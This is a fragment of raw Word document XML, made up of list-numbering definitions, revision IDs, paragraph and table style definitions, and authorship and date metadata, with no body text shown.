    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="242952956">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1895315912">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1697465447">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="367999139">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1818447329">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1468938946">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1122265394">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1788426580">
    <w:abstractNumId w:val="92"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1261260531">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="710612864">
    <w:abstractNumId w:val="88"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1469932942">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="667948830">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="965701919">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1318922606">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="95365836">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="370617169">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="649408278">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="598559580">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1981379331">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="331834968">
    <w:abstractNumId w:val="89"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="83307525">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1442606227">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1462962448">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1098058080">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="431122247">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="120609202">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="390036205">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1334187153">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1051349824">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="711419891">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="633365432">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1429346398">
    <w:abstractNumId w:val="86"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1573349917">
    <w:abstractNumId w:val="87"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="787117207">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="48890646">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="2085570239">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="364448022">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1152596234">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1377896110">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="655691264">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1317606821">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="789013462">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="206719350">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1504777581">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="628318131">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="142698091">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="2034259573">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="1075054461">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1182160658">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="766269071">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="1607152026">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="1988435109">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="1823110163">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="180045706">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="689377092">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="1996259248">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="629288582">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="435058264">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="82" w16cid:durableId="1625847363">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="83" w16cid:durableId="1878855596">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="84" w16cid:durableId="1153640496">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="85" w16cid:durableId="1867671652">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="86" w16cid:durableId="868882050">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="87" w16cid:durableId="1484926903">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="88" w16cid:durableId="2080974877">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="89" w16cid:durableId="1497376621">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="90" w16cid:durableId="144052901">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="91" w16cid:durableId="435058515">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="92" w16cid:durableId="1844584078">
    <w:abstractNumId w:val="94"/>
  </w:num>
  <w:num w:numId="93" w16cid:durableId="1774864786">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="94" w16cid:durableId="1069962632">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="95" w16cid:durableId="43608153">
    <w:abstractNumId w:val="95"/>
  </w:num>
  <w:num w:numId="96" w16cid:durableId="55671373">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="97" w16cid:durableId="917058652">
    <w:abstractNumId w:val="82"/>
  </w:num>
  <w:num w:numId="98" w16cid:durableId="290330273">
    <w:abstractNumId w:val="9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6D2"/>
    <w:rsid w:val="0000430C"/>
    <w:rsid w:val="00032A9E"/>
    <w:rsid w:val="000538F9"/>
    <w:rsid w:val="000748A0"/>
    <w:rsid w:val="00097703"/>
    <w:rsid w:val="000B02BC"/>
    <w:rsid w:val="000F4A7D"/>
    <w:rsid w:val="00195E8F"/>
    <w:rsid w:val="001A78DC"/>
    <w:rsid w:val="00207D89"/>
    <w:rsid w:val="00241B6D"/>
    <w:rsid w:val="002E1763"/>
    <w:rsid w:val="00304247"/>
    <w:rsid w:val="0030439D"/>
    <w:rsid w:val="00356C4E"/>
    <w:rsid w:val="00380392"/>
    <w:rsid w:val="003A3E79"/>
    <w:rsid w:val="003A6E85"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="003D258E"/>
    <w:rsid w:val="003D3846"/>
    <w:rsid w:val="003E7869"/>
    <w:rsid w:val="00406578"/>
    <w:rsid w:val="00431397"/>
    <w:rsid w:val="004D0CEB"/>
    <w:rsid w:val="004F36F6"/>
    <w:rsid w:val="00550349"/>
    <w:rsid w:val="00553C99"/>
    <w:rsid w:val="00554C47"/>
    <w:rsid w:val="005B0311"/>
    <w:rsid w:val="0075324E"/>
    <w:rsid w:val="007549E1"/>
    <w:rsid w:val="007F66BD"/>
    <w:rsid w:val="008026BB"/>
    <w:rsid w:val="008618A9"/>
    <w:rsid w:val="008B0CF1"/>
    <w:rsid w:val="009370F9"/>
    <w:rsid w:val="00996618"/>
    <w:rsid w:val="009F07BB"/>
    <w:rsid w:val="00A0312F"/>
    <w:rsid w:val="00A15A16"/>
    <w:rsid w:val="00A42989"/>
    <w:rsid w:val="00A966AB"/>
    <w:rsid w:val="00AB177C"/>
    <w:rsid w:val="00AC501C"/>
    <w:rsid w:val="00B156B8"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00C826A4"/>
    <w:rsid w:val="00CC1B98"/>
    <w:rsid w:val="00CC2731"/>
    <w:rsid w:val="00D1121B"/>
    <w:rsid w:val="00D429D2"/>
    <w:rsid w:val="00D51177"/>
    <w:rsid w:val="00DD11F5"/>
    <w:rsid w:val="00DF63DB"/>
    <w:rsid w:val="00E24C3A"/>
    <w:rsid w:val="00E26014"/>
    <w:rsid w:val="00E45CF9"/>
    <w:rsid w:val="00ED4312"/>
    <w:rsid w:val="00EE55D1"/>
    <w:rsid w:val="00EE7586"/>
    <w:rsid w:val="00F023DE"/>
    <w:rsid w:val="00F409C7"/>
    <w:rsid w:val="00F413A1"/>
    <w:rsid w:val="00F86E8F"/>
    <w:rsid w:val="00FA409A"/>
    <w:rsid w:val="00FC2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67B39"/>
  <w15:docId w15:val="{12E79056-DB07-44CB-B4D1-13A6888AD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3B460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604"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B460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604"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D511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1177"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable1Light-Accent2">
    <w:name w:val="Grid Table 1 Light Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00AC501C"/>
    <w:pPr>
      <w:spacing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AC501C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Paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00EE7586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EE7586"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ds-markdown-paragraph">
    <w:name w:val="ds-markdown-paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002E17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table" w:styleId="GridTable5Dark">
    <w:name w:val="Grid Table 5 Dark"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="0038039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PlainTable4">
    <w:name w:val="Plain Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="44"/>
    <w:rsid w:val="00380392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12</Pages>
  <Words>1055</Words>
  <Characters>6016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Abhishek M S</dc:creator>
  <cp:lastModifiedBy>ABHISHEK M S</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <cp:lastPrinted>2025-10-03T18:35:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-24T17:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-14T07:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>